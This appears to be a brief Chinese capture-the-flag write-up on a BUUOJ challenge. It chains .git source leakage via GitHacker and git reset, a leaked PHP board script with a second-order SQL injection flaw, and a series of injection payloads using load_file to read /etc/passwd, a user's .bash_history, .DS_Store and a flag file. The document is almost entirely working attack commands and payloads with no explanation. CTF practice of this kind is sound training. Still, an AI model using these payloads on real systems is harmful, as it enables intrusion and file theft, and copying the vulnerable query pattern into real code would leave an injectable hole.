CTFer成长之路-任意文件读取漏洞-文件读取漏洞常见读取路径(SQL二次注入)

python GitHacker.py http://ffd1ae28-f0e2-41c3-9522-ce58080f91e6.node3.buuoj.cn/.git/#链接为有git泄露的链接

git log --relog

git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c

<?phpinclude "mysql.php";session_start();if($_SESSION['login'] != 'yes'){    header("Location: ./login.php");    die();}if(isset($_GET['do'])){switch ($_GET['do']){case 'write':    $category = addslashes($_POST['category']);    $title = addslashes($_POST['title']);    $content = addslashes($_POST['content']);    $sql = "insert into board            set category = '$category',                title = '$title',                content = '$content'";    $result = mysql_query($sql);    header("Location: ./index.php");    break;case 'comment':    $bo_id = addslashes($_POST['bo_id']);    $sql = "select category from board where id='$bo_id'";    $result = mysql_query($sql);    $num = mysql_num_rows($result);    if($num>0){    $category = mysql_fetch_array($result)['category'];    $content = addslashes($_POST['content']);    $sql = "insert into comment            set category = '$category',                content = '$content',                bo_id = '$bo_id'";    $result = mysql_query($sql);    }    header("Location: ./comment.php?id=$bo_id");    break;default:    header("Location: ./index.php");}}else{    header("Location: ./index.php");}?>

',content=(select(load_file("/etc/passwd"))),/*

',content=(select(load_file("/home/www/.bash_history"))),/*

',content=(select(load_file("/tmp/html/.DS_Store"))),/*

',content=(select(load_file("/tmp/html/.DS_Store"))),/*

',content=(select hex(load_file("/tmp/html/.DS_Store"))),/*

',content=(select hex(load_file("/var/www/html/flag_8946e1ff1ee3e40f.php"))),/*